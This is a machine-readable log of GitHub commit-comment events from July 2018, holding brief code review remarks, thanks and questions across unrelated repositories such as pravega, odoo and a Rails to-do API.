{"id":"8015709268","type":"CommitCommentEvent","actor":{"login":"WebReflection"},"repo":{"name":"WebReflection/ascjs"},"payload":{"comment":{"id":29827297,"position":11,"line":183,"path":"index.js","commit_id":"3240ef9a171b114e39b747adbd30642f7a5f725b","created_at":"2018-07-25T10:55:30Z","updated_at":"2018-07-25T10:55:30Z","author_association":"OWNER","body":"actually, the ignore logic might not be fully implemented ..."}},"created_at":"2018-07-25T10:55:30Z"}
{"id":"8015709730","type":"CommitCommentEvent","actor":{"login":"dhuasid"},"repo":{"name":"sasasdasdasdds/Historical-ranking-data-visualization-based-on-d3.js"},"payload":{"comment":{"id":29827298,"position":1,"line":1,"path":".gitignore","commit_id":"44980ae5c5bc2e5ff70c93705523025f9d7a7ee7","created_at":"2018-07-25T10:55:35Z","updated_at":"2018-07-25T10:55:35Z","author_association":"NONE","body":"ff"}},"created_at":"2018-07-25T10:55:35Z"}
{"id":"8015723716","type":"CommitCommentEvent","actor":{"login":"Jopeser"},"repo":{"name":"Jopeser/Rainbow-Poem"},"payload":{"comment":{"id":29827324,"position":3,"line":7,"path":"poem.txt","commit_id":"8eab3774aea2168f63732b511cc32d83471f4185","created_at":"2018-07-25T10:58:45Z","updated_at":"2018-07-25T10:58:45Z","author_association":"OWNER","body":"lol"}},"created_at":"2018-07-25T10:58:45Z"}
{"id":"8015725452","type":"CommitCommentEvent","actor":{"login":"eMPee584"},"repo":{"name":"browsh-org/browsh"},"payload":{"comment":{"id":29827328,"position":null,"line":null,"path":null,"commit_id":"e99a79b5fc319b4b7ef9d15bb8513ef5807d41be","created_at":"2018-07-25T10:59:08Z","updated_at":"2018-07-25T10:59:08Z","author_association":"NONE","body":"Y :scream: "}},"created_at":"2018-07-25T10:59:08Z"}
{"id":"8015725947","type":"CommitCommentEvent","actor":{"login":"Prabha-Veerubhotla"},"repo":{"name":"Nathas1/pravega"},"payload":{"comment":{"id":29827331,"position":1,"line":56,"path":"test/system/src/test/java/io/pravega/test/system/PravegaTest.java","commit_id":"2ac0ae6b92b8b30c30d5d58d0d74b8ba4fe825d2","created_at":"2018-07-25T10:59:15Z","updated_at":"2018-07-25T10:59:15Z","author_association":"NONE","body":"can you extend this class from `AbstractFailoverTests`  like other tests."}},"created_at":"2018-07-25T10:59:15Z"}
{"id":"8015727518","type":"CommitCommentEvent","actor":{"login":"Prabha-Veerubhotla"},"repo":{"name":"Nathas1/pravega"},"payload":{"comment":{"id":29827337,"position":19,"line":202,"path":"test/system/src/test/java/io/pravega/test/system/PravegaTest.java","commit_id":"2ac0ae6b92b8b30c30d5d58d0d74b8ba4fe825d2","created_at":"2018-07-25T10:59:37Z","updated_at":"2018-07-25T10:59:37Z","author_association":"NONE","body":"This doesn't seem correct, you are not actually failing the test here."}},"created_at":"2018-07-25T10:59:37Z"}
{"id":"8015729357","type":"CommitCommentEvent","actor":{"login":"Prabha-Veerubhotla"},"repo":{"name":"Nathas1/pravega"},"payload":{"comment":{"id":29827345,"position":16,"line":199,"path":"test/system/src/test/java/io/pravega/test/system/PravegaTest.java","commit_id":"2ac0ae6b92b8b30c30d5d58d0d74b8ba4fe825d2","created_at":"2018-07-25T11:00:03Z","updated_at":"2018-07-25T11:00:03Z","author_association":"NONE","body":"Also, how are these related to writing and reading in this particular test?\r\n"}},"created_at":"2018-07-25T11:00:03Z"}
{"id":"8015729936","type":"CommitCommentEvent","actor":{"login":"belijkvadrat"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29827347,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T11:00:10Z","updated_at":"2018-07-25T11:00:10Z","author_association":"NONE","body":"Great project with a great ambition!\r\n"}},"created_at":"2018-07-25T11:00:10Z"}
{"id":"8015731253","type":"CommitCommentEvent","actor":{"login":"WebReflection"},"repo":{"name":"WebReflection/ascjs"},"payload":{"comment":{"id":29827355,"position":11,"line":183,"path":"index.js","commit_id":"3240ef9a171b114e39b747adbd30642f7a5f725b","created_at":"2018-07-25T11:00:25Z","updated_at":"2018-07-25T11:00:25Z","author_association":"OWNER","body":"yup, fixed now, it should actually ignore for real 😅"}},"created_at":"2018-07-25T11:00:25Z"}
{"id":"8015731803","type":"CommitCommentEvent","actor":{"login":"Prabha-Veerubhotla"},"repo":{"name":"Nathas1/pravega"},"payload":{"comment":{"id":29827357,"position":18,"line":201,"path":"test/system/src/test/java/io/pravega/test/system/PravegaTest.java","commit_id":"2ac0ae6b92b8b30c30d5d58d0d74b8ba4fe825d2","created_at":"2018-07-25T11:00:32Z","updated_at":"2018-07-25T11:00:32Z","author_association":"NONE","body":"We close reader, delete reader group after validating the event read, write count."}},"created_at":"2018-07-25T11:00:32Z"}
{"id":"8015731813","type":"CommitCommentEvent","actor":{"login":"puremana"},"repo":{"name":"puremana/iou-bot"},"payload":{"comment":{"id":29827358,"position":null,"line":null,"path":null,"commit_id":"faaef6c655c704c53013f493fa2b3d6ce9592ef1","created_at":"2018-07-25T11:00:32Z","updated_at":"2018-07-25T11:00:32Z","author_association":"OWNER","body":"Token changed too :)"}},"created_at":"2018-07-25T11:00:32Z"}
{"id":"8015732888","type":"CommitCommentEvent","actor":{"login":"Prabha-Veerubhotla"},"repo":{"name":"Nathas1/pravega"},"payload":{"comment":{"id":29827359,"position":21,"line":204,"path":"test/system/src/test/java/io/pravega/test/system/PravegaTest.java","commit_id":"2ac0ae6b92b8b30c30d5d58d0d74b8ba4fe825d2","created_at":"2018-07-25T11:00:45Z","updated_at":"2018-07-25T11:00:45Z","author_association":"NONE","body":"Please check other tests."}},"created_at":"2018-07-25T11:00:45Z"}
{"id":"8015734564","type":"CommitCommentEvent","actor":{"login":"puremana"},"repo":{"name":"puremana/iou-bot"},"payload":{"comment":{"id":29827361,"position":null,"line":null,"path":null,"commit_id":"faaef6c655c704c53013f493fa2b3d6ce9592ef1","created_at":"2018-07-25T11:01:04Z","updated_at":"2018-07-25T11:01:04Z","author_association":"OWNER","body":"Token changed too because of accidental push :)"}},"created_at":"2018-07-25T11:01:04Z"}
{"id":"8015737083","type":"CommitCommentEvent","actor":{"login":"Prabha-Veerubhotla"},"repo":{"name":"Nathas1/pravega"},"payload":{"comment":{"id":29827364,"position":23,"line":206,"path":"test/system/src/test/java/io/pravega/test/system/PravegaTest.java","commit_id":"2ac0ae6b92b8b30c30d5d58d0d74b8ba4fe825d2","created_at":"2018-07-25T11:01:37Z","updated_at":"2018-07-25T11:01:37Z","author_association":"NONE","body":"We also need to add `tearDown()`."}},"created_at":"2018-07-25T11:01:37Z"}
{"id":"8015748328","type":"CommitCommentEvent","actor":{"login":"enekid"},"repo":{"name":"CartoDB/Windshaft-cartodb"},"payload":{"comment":{"id":29827383,"position":5,"line":15,"path":"test/support/prepare_db.sh","commit_id":"a858d67cae0d956a882bcc25acd45d23485522a7","created_at":"2018-07-25T11:04:09Z","updated_at":"2018-07-25T11:04:09Z","author_association":"CONTRIBUTOR","body":"Yep, thanks!"}},"created_at":"2018-07-25T11:04:09Z"}
{"id":"8015750296","type":"CommitCommentEvent","actor":{"login":"jgcmarins"},"repo":{"name":"gtkatakura/fullstack-challenge"},"payload":{"comment":{"id":29827388,"position":null,"line":null,"path":null,"commit_id":"bc01861cb7f34fd5bc65b892ef9b33aedadab3e6","created_at":"2018-07-25T11:04:35Z","updated_at":"2018-07-25T11:04:35Z","author_association":"NONE","body":"awesome work here"}},"created_at":"2018-07-25T11:04:35Z"}
{"id":"8015754771","type":"CommitCommentEvent","actor":{"login":"dodyirawan85"},"repo":{"name":"satgass/android_kernel_hisense_msm8916"},"payload":{"comment":{"id":29827396,"position":null,"line":null,"path":null,"commit_id":"e67229370b277d69f7f2b976b2a4ae7f9c61e82e","created_at":"2018-07-25T11:05:35Z","updated_at":"2018-07-25T11:05:35Z","author_association":"NONE","body":"Adakah cara fix layar setengah ..?"}},"created_at":"2018-07-25T11:05:35Z"}
{"id":"8015755367","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29827397,"position":null,"line":null,"path":null,"commit_id":"fb22d545ae78dfe6de5451de25bd41e4d6ca904f","created_at":"2018-07-25T11:05:44Z","updated_at":"2018-07-25T11:05:44Z","author_association":"NONE","body":"In this case, the cache is now filed with a resolved promise.\r\n => In this case, the cache is now filled with a resolved promise.\r\n"}},"created_at":"2018-07-25T11:05:44Z"}
{"id":"8015759282","type":"CommitCommentEvent","actor":{"login":"diyautospec"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29827408,"position":null,"line":null,"path":null,"commit_id":"44bd29fc844cdb21b879144fda4dbb94c4afcd2c","created_at":"2018-07-25T11:06:37Z","updated_at":"2018-07-25T11:06:37Z","author_association":"NONE","body":"this commit breaks the MRP consumption process...\r\n\r\non some seemingly random products to consume, it reads 0 consumed, the correct qty is stored properly in PG quantity_done_store, but it will not read into quantity_done properly, so it consumes 0 of that line.\r\n\r\nI don't know enough to fix the issue, just barely enough to revert commits to this point to get the MRP to consume properly."}},"created_at":"2018-07-25T11:06:37Z"}
{"id":"8015760314","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29827413,"position":18,"line":214,"path":"addons/web/static/src/js/core/ajax.js","commit_id":"fb22d545ae78dfe6de5451de25bd41e4d6ca904f","created_at":"2018-07-25T11:06:49Z","updated_at":"2018-07-25T11:06:49Z","author_association":"NONE","body":"urlDefs[url] = urlDefs[url] || $.when();"}},"created_at":"2018-07-25T11:06:49Z"}
{"id":"8015760365","type":"CommitCommentEvent","actor":{"login":"jacquesdev"},"repo":{"name":"ionic-team/cordova-plugin-ionic-webview"},"payload":{"comment":{"id":29827414,"position":88,"line":93,"path":"README.md","commit_id":"5c8ad8e66b8ccb5c3dc415ad193409dba82d1690","created_at":"2018-07-25T11:06:50Z","updated_at":"2018-07-25T11:06:50Z","author_association":"CONTRIBUTOR","body":"@dwieeb - just wanted to confirm are these settings in the config.xml no longer required in version 2?"}},"created_at":"2018-07-25T11:06:50Z"}
{"id":"8015762195","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29827420,"position":null,"line":null,"path":null,"commit_id":"fb22d545ae78dfe6de5451de25bd41e4d6ca904f","created_at":"2018-07-25T11:07:16Z","updated_at":"2018-07-25T11:07:16Z","author_association":"NONE","body":"ok "}},"created_at":"2018-07-25T11:07:16Z"}
{"id":"8015762289","type":"CommitCommentEvent","actor":{"login":"magicus"},"repo":{"name":"magicus/ProtocolSupport"},"payload":{"comment":{"id":29827422,"position":null,"line":null,"path":null,"commit_id":"e7c7ca51474308df4c7b3d6d8601936f86ebd098","created_at":"2018-07-25T11:07:18Z","updated_at":"2018-07-25T11:07:18Z","author_association":"OWNER","body":"It's not needed. It only makes it impossible to go in the stairs. The freeze issue is an issue in RakNet. "}},"created_at":"2018-07-25T11:07:18Z"}
{"id":"8015770381","type":"CommitCommentEvent","actor":{"login":"fredrikeverts"},"repo":{"name":"fredrikeverts/academind"},"payload":{"comment":{"id":29827446,"position":null,"line":null,"path":null,"commit_id":"852ddc2d29e3fe457f5ce2f27c7854ef968b263e","created_at":"2018-07-25T11:09:12Z","updated_at":"2018-07-25T11:09:12Z","author_association":"OWNER","body":"dfg"}},"created_at":"2018-07-25T11:09:12Z"}
{"id":"8015779190","type":"CommitCommentEvent","actor":{"login":"MMateusiakS"},"repo":{"name":"SmartThingsCommunity/SmartThingsPublic"},"payload":{"comment":{"id":29827464,"position":6,"line":16,"path":"devicetypes/smartthings/zwave-switch-battery.src/zwave-switch-battery.groovy","commit_id":"0421c04a72d503b074f98d5300d3bfa385c4e7ed","created_at":"2018-07-25T11:11:12Z","updated_at":"2018-07-25T11:11:12Z","author_association":"CONTRIBUTOR","body":"Is it working locally or only in cloud?"}},"created_at":"2018-07-25T11:11:12Z"}
{"id":"8015780002","type":"CommitCommentEvent","actor":{"login":"fancywriter"},"repo":{"name":"monix/monix-sample"},"payload":{"comment":{"id":29827467,"position":51,"line":49,"path":"client/src/main/scala/client/BackPressuredWebSocketClient.scala","commit_id":"23d5dda19dc05bacdccd5ef76139c1e5db1f87f9","created_at":"2018-07-25T11:11:23Z","updated_at":"2018-07-25T11:11:23Z","author_association":"NONE","body":"Is it really good idea to catch `Throwable` here, not `NonFatal` instead?"}},"created_at":"2018-07-25T11:11:23Z"}
{"id":"8015784193","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"DDT-Kibe/meikai_java2018_04"},"payload":{"comment":{"id":29827471,"position":null,"line":null,"path":null,"commit_id":"c8509bc3bc07d7b54fa1da4218ca74360813000e","created_at":"2018-07-25T11:12:20Z","updated_at":"2018-07-25T11:12:20Z","author_association":"COLLABORATOR","body":"柴田\r\n全体的にインデントが不正に見えます。\r\nインデント一つは半角スペース4つ(タブ一つで問題ないはず)としてください"}},"created_at":"2018-07-25T11:12:20Z"}
{"id":"8015784220","type":"CommitCommentEvent","actor":{"login":"jupe"},"repo":{"name":"ARMmbed/mbed-flasher"},"payload":{"comment":{"id":29827472,"position":null,"line":null,"path":null,"commit_id":"703ccd1eaa3902ea888ab148bb8d58a7690fc632","created_at":"2018-07-25T11:12:21Z","updated_at":"2018-07-25T11:12:21Z","author_association":"COLLABORATOR","body":"is there defect raised for this?"}},"created_at":"2018-07-25T11:12:21Z"}
{"id":"8015786694","type":"CommitCommentEvent","actor":{"login":"mmroz"},"repo":{"name":"themaplelab/swift"},"payload":{"comment":{"id":29827473,"position":null,"line":null,"path":null,"commit_id":"3bc6c2e3bd57e1709b6ad60e05dec6930c2d4024","created_at":"2018-07-25T11:12:56Z","updated_at":"2018-07-25T11:12:56Z","author_association":"NONE","body":"Nice :)"}},"created_at":"2018-07-25T11:12:56Z"}
{"id":"8015788404","type":"CommitCommentEvent","actor":{"login":"PlacidoPenitente"},"repo":{"name":"PlacidoPenitente/DentalClinicManagementSystem"},"payload":{"comment":{"id":29827475,"position":5,"line":42,"path":"DentalClinicManagementSystem/Controllers/AdministratorsController.cs","commit_id":"dfb2b2dcb579150ca6fdea02db5e19b53f4eeb72","created_at":"2018-07-25T11:13:20Z","updated_at":"2018-07-25T11:13:20Z","author_association":"OWNER","body":"Create an instance before proceeding to page."}},"created_at":"2018-07-25T11:13:20Z"}
{"id":"8015795894","type":"CommitCommentEvent","actor":{"login":"ColinFinck"},"repo":{"name":"hermitcore/libhermit-rs"},"payload":{"comment":{"id":29827488,"position":111,"line":111,"path":"librs/src/arch/aarch64/mm/paging.rs","commit_id":"aad2b8af56a6bb7fc4add46855679e722e68172e","created_at":"2018-07-25T11:15:00Z","updated_at":"2018-07-25T11:15:00Z","author_association":"CONTRIBUTOR","body":"I had thought about this too. However, HermitCore-rs hardly uses the same address type in two places: There are physical addresses, virtual addresses, identity-mapped addresses (where physical == virtual), variants of these storing flags in the lower bits, etc.\r\nI hardly see any benefits from introducing a type alias for each of them. Rather than that, lots of conversions would be necessary."}},"created_at":"2018-07-25T11:15:00Z"}
{"id":"8015798848","type":"CommitCommentEvent","actor":{"login":"viktor-shmigol"},"repo":{"name":"ED1FF/to-do-list-api"},"payload":{"comment":{"id":29827503,"position":4,"line":34,"path":"config/application.rb","commit_id":"a8884019829c622e14eb4ffb5a6225f87eb03ac9","created_at":"2018-07-25T11:15:40Z","updated_at":"2018-07-25T11:15:40Z","author_association":"NONE","body":"remove and uncommit config in initializers/rack-cors.rb"}},"created_at":"2018-07-25T11:15:40Z"}
{"id":"8015799217","type":"CommitCommentEvent","actor":{"login":"priyaljain919"},"repo":{"name":"priyaljain919/github-slideshow"},"payload":{"comment":{"id":29827505,"position":null,"line":null,"path":null,"commit_id":"97a1848e2702830498f2c9fba9e5cdbf19ec30e9","created_at":"2018-07-25T11:15:45Z","updated_at":"2018-07-25T11:15:45Z","author_association":"OWNER","body":"finished"}},"created_at":"2018-07-25T11:15:45Z"}
{"id":"8015802379","type":"CommitCommentEvent","actor":{"login":"MMateusiakS"},"repo":{"name":"SmartThingsCommunity/SmartThingsPublic"},"payload":{"comment":{"id":29827508,"position":54,"line":98,"path":"devicetypes/smartthings/zwave-switch-battery.src/zwave-switch-battery.groovy","commit_id":"0421c04a72d503b074f98d5300d3bfa385c4e7ed","created_at":"2018-07-25T11:16:25Z","updated_at":"2018-07-25T11:16:25Z","author_association":"CONTRIBUTOR","body":"What for is state.lastbatt? There is no use of it."}},"created_at":"2018-07-25T11:16:25Z"}
{"id":"8015803756","type":"CommitCommentEvent","actor":{"login":"viktor-shmigol"},"repo":{"name":"ED1FF/to-do-list-api"},"payload":{"comment":{"id":29827512,"position":3,"line":3,"path":"app/controllers/tasks_controller.rb","commit_id":"df74cfbf4eccf150d4bebd7fb4ff3596ab7fea70","created_at":"2018-07-25T11:16:44Z","updated_at":"2018-07-25T11:16:44Z","author_association":"NONE","body":"Where is http status?"}},"created_at":"2018-07-25T11:16:44Z"}
{"id":"8015804231","type":"CommitCommentEvent","actor":{"login":"cjbj"},"repo":{"name":"go-goracle/goracle"},"payload":{"comment":{"id":29827514,"position":75,"line":546,"path":"drv.go","commit_id":"554bb29a03b89e333e37565c74246e6c72023929","created_at":"2018-07-25T11:16:50Z","updated_at":"2018-07-25T11:16:50Z","author_association":"NONE","body":"Having negative names is always tricky to use and understand"}},"created_at":"2018-07-25T11:16:50Z"}
{"id":"8015805470","type":"CommitCommentEvent","actor":{"login":"flamergamer1234"},"repo":{"name":"EndlessHosting/Discord-LiveBot"},"payload":{"comment":{"id":29827516,"position":null,"line":null,"path":null,"commit_id":"26186f61a093c9765a268a9ff0fe329c97d0ac9b","created_at":"2018-07-25T11:17:07Z","updated_at":"2018-07-25T11:17:07Z","author_association":"MEMBER","body":"crap i meant number 5\r\n"}},"created_at":"2018-07-25T11:17:07Z"}
{"id":"8015806254","type":"CommitCommentEvent","actor":{"login":"viktor-shmigol"},"repo":{"name":"ED1FF/to-do-list-api"},"payload":{"comment":{"id":29827517,"position":7,"line":7,"path":"app/controllers/tasks_controller.rb","commit_id":"df74cfbf4eccf150d4bebd7fb4ff3596ab7fea70","created_at":"2018-07-25T11:17:17Z","updated_at":"2018-07-25T11:17:17Z","author_association":"NONE","body":"move to method"}},"created_at":"2018-07-25T11:17:17Z"}
{"id":"8015809050","type":"CommitCommentEvent","actor":{"login":"xavivars"},"repo":{"name":"apertium/apertium-spa-cat"},"payload":{"comment":{"id":29827522,"position":5,"line":52162,"path":"apertium-spa-cat.spa-cat.dix","commit_id":"86ae5e559cb68258f542e8033a510587b6e0b48a","created_at":"2018-07-25T11:17:57Z","updated_at":"2018-07-25T11:17:57Z","author_association":"MEMBER","body":"zoquete en castellà no seria `mf`?"}},"created_at":"2018-07-25T11:17:57Z"}
{"id":"8015809524","type":"CommitCommentEvent","actor":{"login":"Joudsi"},"repo":{"name":"Fiware/dataModels"},"payload":{"comment":{"id":29827526,"position":null,"line":null,"path":null,"commit_id":"75385c08b289532e3332b3a873d540240b49b6c6","created_at":"2018-07-25T11:18:03Z","updated_at":"2018-07-25T11:18:03Z","author_association":"NONE","body":"modified Barcelona air quality harvester to accept paramenters - \r\nexample : \r\npython barcelona_airquality_harvest.py 08019050 08301004 --service fiwareExample --service-path /test --endpoint http://localhost:1026 --latest\r\n\r\n@caa06d9c \r\n@jmcanterafonseca "}},"created_at":"2018-07-25T11:18:03Z"}
{"id":"8015810342","type":"CommitCommentEvent","actor":{"login":"amit-mb"},"repo":{"name":"code-mancers/dockup"},"payload":{"comment":{"id":29827528,"position":46,"line":82,"path":"apps/dockup_ui/lib/dockup_ui/callback.ex","commit_id":"2d4361c96a0a2068a87726301739c2ed46ad4e71","created_at":"2018-07-25T11:18:15Z","updated_at":"2018-07-25T11:18:15Z","author_association":"MEMBER","body":"Also this should be `deployments.active` I think"}},"created_at":"2018-07-25T11:18:15Z"}
{"id":"8015810862","type":"CommitCommentEvent","actor":{"login":"viktor-shmigol"},"repo":{"name":"ED1FF/to-do-list-api"},"payload":{"comment":{"id":29827529,"position":15,"line":15,"path":"app/controllers/tasks_controller.rb","commit_id":"df74cfbf4eccf150d4bebd7fb4ff3596ab7fea70","created_at":"2018-07-25T11:18:22Z","updated_at":"2018-07-25T11:18:22Z","author_association":"NONE","body":"task.errors.full_messages"}},"created_at":"2018-07-25T11:18:22Z"}
{"id":"8015811781","type":"CommitCommentEvent","actor":{"login":"viktor-shmigol"},"repo":{"name":"ED1FF/to-do-list-api"},"payload":{"comment":{"id":29827533,"position":20,"line":20,"path":"app/controllers/tasks_controller.rb","commit_id":"df74cfbf4eccf150d4bebd7fb4ff3596ab7fea70","created_at":"2018-07-25T11:18:34Z","updated_at":"2018-07-25T11:18:34Z","author_association":"NONE","body":"move to method"}},"created_at":"2018-07-25T11:18:34Z"}
{"id":"8015811851","type":"CommitCommentEvent","actor":{"login":"alexandru"},"repo":{"name":"monix/monix-sample"},"payload":{"comment":{"id":29827534,"position":51,"line":49,"path":"client/src/main/scala/client/BackPressuredWebSocketClient.scala","commit_id":"23d5dda19dc05bacdccd5ef76139c1e5db1f87f9","created_at":"2018-07-25T11:18:35Z","updated_at":"2018-07-25T11:18:35Z","author_association":"MEMBER","body":"`NonFatal` is cool, but has absolutely no effect on the client side, as this is not the JVM."}},"created_at":"2018-07-25T11:18:35Z"}
{"id":"8015813495","type":"CommitCommentEvent","actor":{"login":"viktor-shmigol"},"repo":{"name":"ED1FF/to-do-list-api"},"payload":{"comment":{"id":29827536,"position":27,"line":27,"path":"app/controllers/tasks_controller.rb","commit_id":"df74cfbf4eccf150d4bebd7fb4ff3596ab7fea70","created_at":"2018-07-25T11:18:56Z","updated_at":"2018-07-25T11:18:56Z","author_association":"NONE","body":"use method update"}},"created_at":"2018-07-25T11:18:56Z"}
{"id":"8015813743","type":"CommitCommentEvent","actor":{"login":"vorrax"},"repo":{"name":"kinerity/trackers"},"payload":{"comment":{"id":29827537,"position":null,"line":null,"path":null,"commit_id":"069b86f727aca77068aa0eb2f7e379351646d27e","created_at":"2018-07-25T11:19:00Z","updated_at":"2018-07-25T11:19:00Z","author_association":"NONE","body":"Thank you"}},"created_at":"2018-07-25T11:19:00Z"}
{"id":"8015814578","type":"CommitCommentEvent","actor":{"login":"viktor-shmigol"},"repo":{"name":"ED1FF/to-do-list-api"},"payload":{"comment":{"id":29827539,"position":30,"line":30,"path":"app/controllers/tasks_controller.rb","commit_id":"df74cfbf4eccf150d4bebd7fb4ff3596ab7fea70","created_at":"2018-07-25T11:19:12Z","updated_at":"2018-07-25T11:19:12Z","author_association":"NONE","body":"task.errors.full_messages"}},"created_at":"2018-07-25T11:19:12Z"}
{"id":"8015816031","type":"CommitCommentEvent","actor":{"login":"navytux"},"repo":{"name":"signal18/replication-manager"},"payload":{"comment":{"id":29827541,"position":5,"line":5,"path":"graphite/og-rek/ogorek.go","commit_id":"f3dcf4b7875842cc1c5211543e361a8cde06ed74","created_at":"2018-07-25T11:19:31Z","updated_at":"2018-07-25T11:19:31Z","author_association":"NONE","body":"@signal18, @svaroqui, FYI the copyright notices added here to og-rek, and probably to other places, are not correct. Ogórek (https://github.com/kisielk/og-rek) is just vendored here and its authors are not `Guillaume Lefranc` and `Stephane Varoqui`. Please correct, thanks. /cc @kisielk"}},"created_at":"2018-07-25T11:19:31Z"}
{"id":"8015819984","type":"CommitCommentEvent","actor":{"login":"viktor-shmigol"},"repo":{"name":"ED1FF/to-do-list-api"},"payload":{"comment":{"id":29827547,"position":2,"line":2,"path":"app/models/task.rb","commit_id":"df74cfbf4eccf150d4bebd7fb4ff3596ab7fea70","created_at":"2018-07-25T11:20:27Z","updated_at":"2018-07-25T11:20:27Z","author_association":"NONE","body":"Remove this line, Add default: false in migration. "}},"created_at":"2018-07-25T11:20:27Z"}
{"id":"8015821814","type":"CommitCommentEvent","actor":{"login":"amjadkhan1995"},"repo":{"name":"HanSolo/tilesfx"},"payload":{"comment":{"id":29827552,"position":null,"line":null,"path":null,"commit_id":"37f823d8c77c60915847395d3bd6b096ade949a6","created_at":"2018-07-25T11:20:53Z","updated_at":"2018-07-25T11:20:53Z","author_association":"NONE","body":"I’m sorry if I’m bothering you but do i need to learn about gradle in case to use your library?"}},"created_at":"2018-07-25T11:20:53Z"}
{"id":"8015821894","type":"CommitCommentEvent","actor":{"login":"viktor-shmigol"},"repo":{"name":"ED1FF/to-do-list-api"},"payload":{"comment":{"id":29827553,"position":2,"line":2,"path":"app/models/task.rb","commit_id":"df74cfbf4eccf150d4bebd7fb4ff3596ab7fea70","created_at":"2018-07-25T11:20:54Z","updated_at":"2018-07-25T11:20:54Z","author_association":"NONE","body":"What about validations?"}},"created_at":"2018-07-25T11:20:54Z"}
{"id":"8015821939","type":"CommitCommentEvent","actor":{"login":"tgulacsi"},"repo":{"name":"go-goracle/goracle"},"payload":{"comment":{"id":29827554,"position":75,"line":546,"path":"drv.go","commit_id":"554bb29a03b89e333e37565c74246e6c72023929","created_at":"2018-07-25T11:20:54Z","updated_at":"2018-07-25T11:20:54Z","author_association":"CONTRIBUTOR","body":"Can you suggest a better alternative?"}},"created_at":"2018-07-25T11:20:54Z"}
{"id":"8015824103","type":"CommitCommentEvent","actor":{"login":"zh-wj"},"repo":{"name":"trazyn/weweChat"},"payload":{"comment":{"id":29827558,"position":null,"line":null,"path":null,"commit_id":"6e10cbe7605a0a413b8b02d1bbc6a5f67f6efc09","created_at":"2018-07-25T11:21:24Z","updated_at":"2018-07-25T11:21:24Z","author_association":"NONE","body":"新版本包么？测试下"}},"created_at":"2018-07-25T11:21:24Z"}
{"id":"8015824196","type":"CommitCommentEvent","actor":{"login":"viktor-shmigol"},"repo":{"name":"ED1FF/to-do-list-api"},"payload":{"comment":{"id":29827559,"position":4,"line":3,"path":"config/routes.rb","commit_id":"df74cfbf4eccf150d4bebd7fb4ff3596ab7fea70","created_at":"2018-07-25T11:21:25Z","updated_at":"2018-07-25T11:21:25Z","author_association":"NONE","body":"remove empty line"}},"created_at":"2018-07-25T11:21:25Z"}
{"id":"8015824494","type":"CommitCommentEvent","actor":{"login":"MEAHRNewsletter"},"repo":{"name":"MEAHRNewsletter/3QHRQ"},"payload":{"comment":{"id":29827560,"position":null,"line":null,"path":null,"commit_id":"b921c71be7d3857490c34ab5b9e8e2244a732c12","created_at":"2018-07-25T11:21:30Z","updated_at":"2018-07-25T11:21:30Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.w3ibm.bluemix.net/devops/toolchains/e547249b-b196-4b52-abca-ef0e6f4cfaf4?env_id=ibm%3Aw3ibm%3Aus-south \"3QHRQ\"): [Delivery Pipeline](https://console.w3ibm.bluemix.net/devops/pipelines/181e91e9-50ca-465c-b40c-44e5e906df12?env_id=ibm%3Aw3ibm%3Aus-south \"3QHRQ\") deployed [3QHRQ](https://github.com/MEAHRNewsletter/3QHRQ/releases/tag/deploy-w3ibm-prod-us-south-MEAHR-HR-Quarterly-20180725-112128 \"deploy-w3ibm-prod-us-south-MEAHR-HR-Quarterly-20180725-112128\") to [HR Quarterly](https://console.w3ibm.bluemix.net/apps/7310c6c4-a2f7-47ba-8b23-88f8ce2c8cfe?env_id=w3ibm:prod:us-south \"w3ibm:prod:us-south:MEAHR:HR Quarterly\"), including this commit"}},"created_at":"2018-07-25T11:21:30Z"}
{"id":"8015861972","type":"CommitCommentEvent","actor":{"login":"trazyn"},"repo":{"name":"trazyn/weweChat"},"payload":{"comment":{"id":29827629,"position":null,"line":null,"path":null,"commit_id":"6e10cbe7605a0a413b8b02d1bbc6a5f67f6efc09","created_at":"2018-07-25T11:30:08Z","updated_at":"2018-07-25T11:30:08Z","author_association":"OWNER","body":"我用的`v10.6.0`，`Travis CI`跑的是`Node 6`"}},"created_at":"2018-07-25T11:30:08Z"}
{"id":"8015867264","type":"CommitCommentEvent","actor":{"login":"m4dEngi"},"repo":{"name":"m4dEngi/open-steamworks"},"payload":{"comment":{"id":29827636,"position":null,"line":null,"path":null,"commit_id":"ffa9460e93a0880239c18ffb777a958213d7ebdb","created_at":"2018-07-25T11:31:16Z","updated_at":"2018-07-25T11:31:16Z","author_association":"OWNER","body":"That's the interface used by new chat client.\r\nNot tested well.\r\n"}},"created_at":"2018-07-25T11:31:16Z"}
{"id":"8015869213","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29827640,"position":42,"line":166,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/coroutines/CoroutineTransformerMethodVisitor.kt","commit_id":"facae6ae81a6b6fc37aec29fbbb1fe4e3b9a5e4a","created_at":"2018-07-25T11:31:44Z","updated_at":"2018-07-25T11:31:44Z","author_association":"MEMBER","body":"Seems to be unused"}},"created_at":"2018-07-25T11:31:44Z"}
{"id":"8015869634","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/meta-dream"},"payload":{"comment":{"id":29827643,"position":null,"line":null,"path":null,"commit_id":"3d14e95e773a1a78fc7592f4e20fb99b71cd778d","created_at":"2018-07-25T11:31:50Z","updated_at":"2018-07-25T11:31:50Z","author_association":"MEMBER","body":"Also I did remove \"kernelwifi\" for \"smallflash\" machines."}},"created_at":"2018-07-25T11:31:50Z"}
